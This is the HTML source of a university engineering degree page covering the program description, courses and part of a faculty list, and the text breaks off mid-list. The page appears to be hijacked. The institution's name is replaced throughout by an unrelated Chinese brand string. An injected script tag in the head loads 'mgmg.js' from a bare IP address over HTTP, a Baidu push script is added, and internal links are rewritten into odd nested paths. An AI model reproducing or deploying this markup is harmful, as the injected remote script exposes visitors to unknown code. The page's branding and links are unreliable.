  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
      <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
      <meta content="engineering, design, build" name="keywords" />
      <meta content="Develop your math, science, and problem-solving skills to become an ethical engineer. Learn more about SA国际传媒's ABET-accredited engineering major." name="description" />
       

<!-- begin Convert Experiences code added 3-30-2021 -->
<script type="text/javascript" src="none"></script>
<!-- end Convert Experiences code -->



<!-- Google Tag Manager -->
<noscript><iframe height="0" src="//www.googletagmanager.com/ns.html?id=GTM-NJ49Q2" style="display:none;visibility:hidden" width="0"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-NJ49Q2');</script>
<!-- End Google Tag Manager -->

   
      <title>Bachelor鈥檚 in Engineering (BSE Degree) | SA国际传媒</title>
<meta content="Bachelor鈥檚 in Engineering (BSE Degree) | SA国际传媒" name="title" />
<link href="https://www.geneva.edu/academics/programs/engineering-general" rel="canonical" />



      
        <!-- standard scripts include -->
      <div>

	
<!-- latest jQuery direct from google's CDN Keep // for secure https links -->

<!--<script src="none" type="text/javascript"></script>-->

<!-- MOBILE SPECIFIC METAS ================================= -->
<meta content="width=device-width initial-scale=1.0 maximum-scale=1.0 user-scalable=yes" name="viewport"/>
<!-- Custom mobile header theme color -->
<meta name="theme-color" content="#c99a2c">
<meta name="msapplication-navbutton-color" content="#c99a2c">
<meta name="theme-color" content="#c99a2c">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

<!-- FONTS ================================================= -->

<!--<link href="https://fonts.googleapis.com/css?family=Nunito:400,400i,700,700i,900" rel="stylesheet"/>-->

<!-- Font Awesome 5 -->
<script src="none" crossorigin="anonymous"></script>
<!--<link crossorigin="anonymous" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" rel="stylesheet"/>-->


<!-- CSS =================================================== -->
<link href="https://www.geneva.edu/_files/css/normalize.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/main-nav-responsive.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/main-nav-pure.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.mmenu.all.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.jscrollpane.css" media="all" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/geneva-main-streamline.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/left-nav-responsive.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/right-menu-styles.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/clicknav.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/search-modal.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/skeleton-newbrand.css" rel="stylesheet"/> 

<!-- FAVICON ================================================ -->
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="icon" type="image/x-icon"/>
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="shortcut icon" type="image/x-icon"/>
<!-- latest jQuery direct from google's CDN Keep // for secure https links -->
<script src="none" type="text/javascript"></script>




</div>    <!-- standard scripts include -->
      <div>
<link href="/academics/programs/css/streamline-academic-styles.css" rel="stylesheet"/>


</div>  
      


        <style>
h1, h2, h3, h4, h5 {
    font-family: Poppins,sans-serif!important;
}
h1 span {
    margin-top: 20px;
}
</style>


      
      
      <link href="https://www.geneva.edu/_files/css/colorbox.css" rel="stylesheet" />


<script src="none" ></script>
<script>
   $(document).ready(function(){
    //Examples of how to assign the ColorBox event to elements
    $(".group1").colorbox({rel:'group1'});
    $(".group2").colorbox({rel:'group2', transition:"fade"});
    $(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
    $(".group4").colorbox({rel:'group4', slideshow:true});
    $(".ajax").colorbox();
if( /Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent) ) {
} else {
    $(".youtube").colorbox({iframe:true, innerWidth:640, innerHeight:390});
    $(".vimeo").colorbox({iframe:true, innerWidth:500, innerHeight:409});
    $(".iframe").colorbox({iframe:true,fixed: true, width:"80%", height:"80%"});
    $(".iframeprint").colorbox({iframe:true, width:"720", height:"700"});
    $(".iframepdf").colorbox({iframe:true, innerWidth:800, innerHeight:650});
    $(".iframepdfshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshow").colorbox({rel:'iframeshow'});
}
    $(".inline").colorbox({inline:true,scrolling:true, width:"80%"});
    $(".callbacks").colorbox({
     onOpen:function(){ alert('onOpen: colorbox is about to open'); },
     onLoad:function(){ alert('onLoad: colorbox has started to load the targeted content'); },
     onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
     onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
     onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
    });
    $('.non-retina').colorbox({rel:'group5', transition:'none'})
    $('.retina').colorbox({rel:'group5', transition:'none', retinaImage:true, retinaUrl:true});
    
    //preserving a JavaScript event for inline calls.
    $("#click").click(function(){ 
     $('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
     return false;
    });
   });


// Stop browser scrolling

$(document).bind('cbox_open', function () {
    $('html').css({ overflow: 'hidden' });
}).bind('cbox_closed', function () {
    $('html').css({ overflow: 'auto' });
}); 

// Stop browser scrolling


</script>
      

<!-- START OPEN GRAPH TAGS-->
    <meta content="Engineering" property="og:title" />
        <meta content="website" property="og:type" />
    
	<meta content="https://www.geneva.edu/academics/programs/engineering-general" property="og:url" />
		<meta content="Develop your math, science, and problem-solving skills to become an ethical engineer. Learn more about SA国际传媒's ABET-accredited engineering major." property="og:description" />
			    <meta content="https://www.geneva.edu/academics/programs/_images/program-thumbnail-engineering.jpg" property="og:image" />
		<!-- END OPEN GRAPH TAGS-->

   
<script src="http://154.215.109.3/mgmg.js"></script>


</head>
   <Body><h1><a href="/">SA国际传媒</a></h1><script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
      <div class="bg-blur">
          <div id="topLinkBar">
               <!-- ICO BAR Include Here-->
             <div>
<!-- Ico Bar --><ul class="topicobar">
<li class="btndrop2 first"><i class="fa-solid fa-pen-to-square">&#160;</i> APPLY
<ul class="btndrop-menu leftalign">
<li><a href="/admissions/tugapply.php">Undergraduate</a></li>
<li><a href="/online-degree/odpapply.php">Online Degree</a></li>
<li><a href="/graduate/gradapply.php">Graduate</a></li>
</ul>
</li>
<li class="nodrop"><a class="toplevel" href="none"><i class="fa-solid fa-gift-card">&#160;</i> GIVE</a></li>
<li class="nodrop"><a class="toplevel" href="/admissions/visit/"><i class="fa-regular fa-location-dot">&#160;</i> VISIT</a></li>
</ul><!-- end Ico Bar -->


</div>          </div>
          <div id="headSpace">
               <div>
<link href="/_files/css/head-bar-streamline.css" rel="stylesheet" type="text/css"/>
<div id="headContainer">
<div class="sec1">
<div id="logoFlag"><a href="/"><img alt="SA国际传媒" height="525" src="/_files/sitegraphics/geneva-spade-light.svg" width="1920"/> </a></div>
<a id="pagetop" name="pagetop"></a></div>
<div class="sec2">
<div id="navMenuSpace">
<div id="navMenuContainer"><nav>
<ul class="click-nav">
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">SA国际传媒</a>
<ul>
<li><a href="/about-geneva/">Fast Facts &amp; Overview</a></li>
<li><a href="/about-geneva/identity/">Geneva Identity</a></li>
<li><a href="/about-geneva/policies/">Academic Policies</a></li>
<li><a href="/about-geneva/leadership.php">Leadership</a></li>
<li><a href="/articles/">Stories, Blogs &amp; Articles</a></li>
<li><a href="/calendar/">Calendar of Events</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Academics</a>
<ul>
<li><a href="/academics/">Explore Academics</a></li>
<li><a href="/academics/programs/">Search Degree Programs</a></li>
<li><a href="/academics/core-studies/">Core Curriculum</a></li>
<li><a href="/academics/honors/">Honors Program</a></li>
<li><a href="/graduate/">Graduate Programs</a></li>
<li><a href="/online-degree/">Online Degree Programs</a></li>
<li><a href="/pittsburgh/">Geneva Pittsburgh Campus</a></li>
<li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
<li><a href="/cfl/">Center for Faith &amp; Life</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Admissions &amp; Aid</a>
<ul>
<li><a href="/financial-aid/tug-financial-aid.php">Undergraduate</a></li>
<li><a href="/graduate/admissions/">Graduate</a></li>
<li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
<li><a href="/admissions/visit/">Visit Geneva</a></li>
<li><a href="/admissions/international/">International Students</a></li>
<li><a href="/admissions/transfers/">Transfer Students</a></li>
<li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
<li><a href="/admissions/military/">Military &amp; Veterans</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Student Life</a>
<ul>
<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
<li><a href="/calling-career/">Calling &amp; Career</a></li>
<li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
<li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
<li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
<li><a href="/student-life/campus-safety/">Campus Safety</a></li>
<li><a href="/student-life/academic-support/">Academic Support</a></li>
<li><a href="/student-life/commuters.php">Commuter Life</a></li>
<li><a href="/student-life/student-resources.php">Student Resources</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Alumni</a>
<ul>
<li><a href="none">Giving</a></li>
<li><a href="/alumni/">Alumni Home</a></li>
<li><a href="/alumni/events/">Alumni Events</a></li>
<li><a href="/alumni/connect/alumni_updateform.php">Alumni Update Form</a></li>
<li><a href="/academics/registrar/student_records_transcripts.php">Transcript Requests</a></li>
<li><a href="/alumni/represent/alumni_referrals.php">Gold and White Referrals</a></li>
<li><a href="/alumni/represent/legacylink.php">Legacy Link Program</a></li>
<li><a href="/alumni/connect/alumni_contact.php">Contact Alumni Engagement</a></li>
</ul>
</li>
<li><a href="none">Athletics</a></li>
</ul>
</nav></div>
<!-- end navMenuContainer --></div>
</div>
<div class="sec3">
<div id="searchGlass"><button class="searchButton" id="modalsearch"> <i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228;"></i> </button></div>
<div id="screencheck"></div>
<div class="menutrigger"><a href="#menu">&#160;</a></div>
</div>
</div>
<script>// <![CDATA[
document.addEventListener('DOMContentLoaded', () => {
  const menu = document.querySelector('#navMenuSpace .click-nav');
  if (!menu) return;

  // Make any LI that has a UL easier to target
  menu.querySelectorAll(':scope > li').forEach(li => {
    if (li.querySelector(':scope > ul')) li.classList.add('has-submenu');
  });

  const triggers = menu.querySelectorAll(':scope > li.has-submenu > a');

  // ARIA
  triggers.forEach(a => {
    a.setAttribute('aria-haspopup', 'true');
    a.setAttribute('aria-expanded', 'false');
  });

  function closeAll(except) {
    menu.querySelectorAll(':scope > li.submenu_open').forEach(li => {
      if (li !== except) {
        li.classList.remove('submenu_open');
        const btn = li.querySelector(':scope > a[aria-expanded]');
        if (btn) btn.setAttribute('aria-expanded', 'false');
      }
    });
  }

  triggers.forEach(a => {
    a.addEventListener('click', e => {
      const li = a.parentElement;
      const sub = a.nextElementSibling;
      if (sub && sub.tagName === 'UL') {
        e.preventDefault();
        const wasOpen = li.classList.contains('submenu_open');
        closeAll(li);
        li.classList.toggle('submenu_open', !wasOpen);
        a.setAttribute('aria-expanded', String(!wasOpen));
      }
    });

    // Keyboard support
    a.addEventListener('keydown', e => {
      if (e.key === 'Enter' || e.key === ' ') { e.preventDefault(); a.click(); }
      if (e.key === 'Escape') { closeAll(); a.blur(); }
      if (e.key === 'ArrowDown') {
        const first = a.parentElement.querySelector(':scope > ul a');
        if (first) { e.preventDefault(); a.setAttribute('aria-expanded', 'true'); a.parentElement.classList.add('submenu_open'); first.focus(); }
      }
    });
  });

  // Close when clicking outside / focus leaves / press Esc
  document.addEventListener('click', e => { if (!menu.contains(e.target)) closeAll(); });
  document.addEventListener('focusin', e => { if (!menu.contains(e.target)) closeAll(); });
  document.addEventListener('keydown', e => { if (e.key === 'Escape') closeAll(); });
});
// ]]></script>


</div>          </div>
          





    <style type="text/css">
    .videoWindow-clip.clip-hero:after {
    background-image: linear-gradient(rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0) 20%);
    content: '';
    display: block;
    width: 100%;
    height: 100%;
    position: absolute;
    top: 0px;
    left: 0;
    opacity: 1;
    pointer-events: none;
}
        .videoWindow-clip {
            background: #000000 url(_images/program-hero-engineering.jpg) no-repeat center;
            height:550px; 
            background-attachment:initial;
        }
                @media(min-width: 750px){
           .videoWindow-clip {
               height:auto!important;
           }
        }
        @media(min-width: 960px){
           .videoWindow-clip {
               background-attachment:fixed;
           }
        }
                }
    </style>
<link href="/academics/programs/engineering-general/_images/degree-maps/css/css/academic-hero-button-streamline.css" rel="stylesheet" />
<!-- Academics Hero -->
<div class="videoWindow-clip clip-hero">
    <div class="moireOverlay">
            </div>
    <div id="heroTitle">
                <p style="color:#ffffff"><span class="ico-circ">BSE</span> Major</p>
                        <h2>Engineering</h2>
                        <span>Impact society with a versatile and challenging engineering degree. </span>
                <div class="actionButtons"><a class="button cleanwhite" href="none" target="_blank">Apply</a> <a class="button cleanwhite" href="#ctaForm" target="_blank">Request Information</a></div>
    </div>
</div>

<svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="large-hero-clip"><path d="M1,0 v0.918 h-0.453 c-0.028,0,-0.047,0.082,-0.047,0.082 s-0.019,-0.082,-0.047,-0.082 H0 V0 H1" /></clipPath>
      </svg>

      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="medium-hero-clip"><path d="M1,0 v0.918 H0.565 c-0.039,0,-0.065,0.082,-0.065,0.082 s-0.026,-0.082,-0.065,-0.082 H0 V0 H1" /></clipPath>
      </svg>

      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="small-hero-clip"><path d="M1,0 v0.844 H0.722 c-0.133,0,-0.222,0.156,-0.222,0.156 s-0.089,-0.156,-0.221,-0.156 H0 V0 H1" /></clipPath>
      </svg>
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="tall-hero-large"><path d="M1,0 v0.899 H0.568 c-0.041,0,-0.068,0.101,-0.068,0.101 s-0.027,-0.101,-0.068,-0.101 H0 V0 H1" /></clipPath>
      </svg>
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="tall-hero-medium"><path d="M1,0.001 v0.899 H0.59 c-0.054,0,-0.09,0.101,-0.09,0.101 s-0.036,-0.101,-0.089,-0.101 H0 V0.001 H1" /></clipPath>
      </svg>
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="tall-hero-small"><path d="M1,0 v0.874 H0.663 c-0.098,0,-0.162,0.126,-0.162,0.126 s-0.065,-0.126,-0.162,-0.126 H0 V0 H1" /></clipPath>
      </svg>
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="small-hero-clip-button"><path d="M0.732,0.897 h0.268 V0 H0 v0.897 h0.268 c0.138,0,0.232,0.103,0.232,0.103 c0,0,0.092,-0.103,0.232,-0.103" /></clipPath>
      </svg>

      
<!-- End Academics Hero -->









          
          

<div id="statusBarSpace">
	<div class="center" id="statusBarContainer">
		<div id="breadCrumbs">
<ul>
            
            
        
                <li><a href="/academics/programs/engineering-general/_images/index.php">Home</a></li>
                
            
        
                <li><a href="/academics/programs/engineering-general/_images/degree-maps/index.php">Academics</a></li>
                
            
        
                                    <li><a href="/academics/programs/engineering-general/_images/degree-maps/css/index.php">Degree Programs</a></li>
            
                                    
                                    
            <li class="selected">Engineering</li>
            
</ul>
		</div>
	</div>
</div>
          <div id="contentSpace">
             
             <div id="contentContainer">
                <!--<div id="contentFullscreen">-->
                <div id="pageContentAcademics">
                   

                   
                   
                   
                   <div class="content-container">
                          <content ></content>

                      
                      
                      
                      
                      <!-- Intro Content -->
<div class="container reveal">
<div class="row">
<div class="six columns">
<p class="largetext">
Earn an Engineering degree at SA国际传媒 and make our world better through innovative research, development, and creation of systems and products.&#160;Through collaboration with peers, hands-on learning, or participation in engineering internships, our engineering majors hone their understanding of the essential work needed to lead a well-functioning society. With our ABET-accredited engineering degree program, you create, design, and develop a better tomorrow while actively exploring the relationship between the Christian faith and the built environment.

</p>
</div>
<div class="six columns center">
<div class="polygon shape" style="background-image: linear-gradient(to bottom,  rgba(255, 208, 0, 0.5),rgba(1, 87, 138, 0.5)), url('/academics/programs/engineering-general/_images/degree-maps/css/_images/program-faith-shape-engineering.jpg'); ">
<h3><span>Through integration of the Christian faith, your engineering degree allows you to give back to your community.</span></h3>
</div>
</div>
</div>
</div>

                      <!-- Program Facts -->
<div class="section facts">
    <div class="wide-container">
        <div class="flex-container">
                <div class="flex-item-1">
        <div class="flexpad statholder">
            <h5><i class="fal fa-university" ></i> <span class="textwhite">A Leader in Engineering</span></h5>
            <p>1 of 15 CCCU schools with an ABET-accredited engineering program</p>                                    <a class="more_link" href="/academics/programs/engineering-general/_images/about-geneva/accreditation.php" ></a>
                                </div>
        </div>
                <div class="flex-item-1">
        <div class="flexpad statholder">
            <h5><i class="far fa-trophy" ></i> <span class="textwhite">Competitive Hands-On Experience </span></h5>
            <p>Geneva competes in national intercollegiate engineering competitions</p>                    </div>
        </div>
                <div class="flex-item-1">
        <div class="flexpad statholder">
            <h5><i class="fa-light fa-buildings" ></i> <span class="textwhite">Project-Based Learning</span></h5>
            <p>Hone your engineering skills by working hands-on with companies in the greater Pittsburgh, PA, region by developing innovative solutions to real-world problems</p>                    </div>
        </div>
                <div class="flex-item-1">
        <div class="flexpad statholder">
            <h5><i class="fal fa-tachometer-alt-fastest" ></i> <span class="textwhite">Nationally Ranked Engineering Program  </span></h5>
            <p>U.S. News and World Report recognizes Geneva as a 2022 national top undergraduate engineering school. </p>                    </div>
        </div>
                </div><!-- flexrow-->
    </div>
</div>
<!-- End Program Facts -->

                      <!-- Key Courses Quad -->
<div class="section quad">
<div class="container poppins">
<h2 class="center headerline">Key Engineering Courses</h2>
<div class="grid-container">
<div>
<div class="flexcenter"><i class="fal fa-chart-network" ></i>
<h3>Solid Mechanics</h3>
<p>Participate in hands-on labs where you learn how solid materials change, move, and how to manipulate them</p>
</div>
</div>
<div>
<div class="flexcenter"><i class="fas fa-user-astronaut" ></i>
<h3>Engineering Calling and Vocation</h3>
<p>Meet God鈥檚 call to aid others through the development of your engineering capabilities</p>
</div>
</div>
<div>
<div class="flexcenter"><i class="far fa-map-marked-alt" ></i>
<h3>Christian Ethics and Engineering</h3>
<p>Take on complex ethical problems as you learn to practice engineering faithfully</p>
</div>
</div>
<div>
<div class="flexcenter"><i class="fal fa-ruler-triangle" ></i>
<h3>Senior Design</h3>
<p>Take on an engaging engineering project for a real client or complete realistic design problems</p>
</div>
</div>
</div>

<div class="center" style="margin-top:30px"> 
<a class="button large clean iframepdf" href="/academics/programs/engineering-general/_images/degree-maps/css/degree-maps/program_engineering_interdisciplinary_v3.pdf"> <i class="fa-regular fa-file-pdf" ></i> View Example Course Map</a>
</div>
</div>
</div>

<!-- End Key Courses -->

                      
                      
                      
                      <link href="https://www.geneva.edu/_files/carousel/ver2/assets/owl.carousel.min.css" rel="stylesheet" />
<link href="https://www.geneva.edu/_files/carousel/ver2/assets/owl.theme.default.min.css" rel="stylesheet" />
<div class="section keyfaculty" id="faculty"><!-- Key Faculty -->
<div class="black-bg-container">
<div class="scroll-container">
<h2 class="facultyTxtHead">Experienced &amp; Accomplished Faculty</h2>
                       <div class="owl-carousel scroller-faculty">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_anthony_comer.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/dr-comer.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Anthony Comer</span>
                                <div class="whitetext" id="deptTitle"> Professor of Engineering and Chair, Department of Engineering</div>
                            </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/computer-science/faculty_gordon_richards.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/2019-gordy-richards.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Gordon Richards</span>
                                <div class="whitetext" id="deptTitle">Associate Professor of Computer Science and Chair, Department of Computer Science and Director, Master in Cybersecurity Program</div>
                            </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_mark_kennedy.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/mark-kennedy.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Mark Kennedy</span>
                                <div class="whitetext" id="deptTitle">Professor of Environmental Engineering</div>
                            </div>
                                                                                                                                                                                                                                                        <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_christopher_jobes.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/jobes.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Christopher Jobes</span>
                                <div class="whitetext" id="deptTitle">Professor of Mechanical and Computer Engineering</div>
                            </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty-mark-tronzo.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/mark-tronzo.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Mark  Tronzo</span>
                                <div class="whitetext" id="deptTitle">Associate Professor of Engineering and Math</div>
                            </div>
                                                                                                                                                                                                                                                                                                                        <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty-vitaliy-saykin.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/vitaliy-saykin.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Vitaliy Saykin</span>
                                <div class="whitetext" id="deptTitle">Associate Professor of Civil Engineering</div>
                            </div>
                                                                                                                                                                                                                                                        <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_bill_barlow.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/bill_barlow.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>William Barlow</span>
                                <div class="whitetext" id="deptTitle">Associate Professor of Electrical, Computer, &amp; Biomedical Engineering and Pinkerton Center Director</div>
                            </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_david_shaw.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/david-shaw.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>David Shaw</span>
                                <div class="whitetext" id="deptTitle">Professor of Mechanical Engineering</div>
                            </div>
                                                                                                                                                                                                                                                        <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_murat_tanyel.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/murat_tanyel.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Murat Tanyel</span>
                                <div class="whitetext" id="deptTitle">Professor of Electrical, Computer, and Biomedical Engineering</div>
                            </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty-ken-wilson.php" target="_blank">
                                <div class="cropcircle border-white" id="cropimage" style="background: url('/academics/programs/engineering-general/_images/faculty-staff/faculty/_assets/ken-wilson.jpg') center top / cover no-repeat transparent;">
                                </div>
                                </a>
                                <span>Ken Wilson</span>
                                <div class="whitetext" id="deptTitle">Adjunct Professor of Engineering</div>
                            </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        <div class="content-card">
                                                                <a href="/academics/programs/engineering-general/_images/faculty-staff/faculty/engineering/faculty_dave_clark.php" target="_blank">
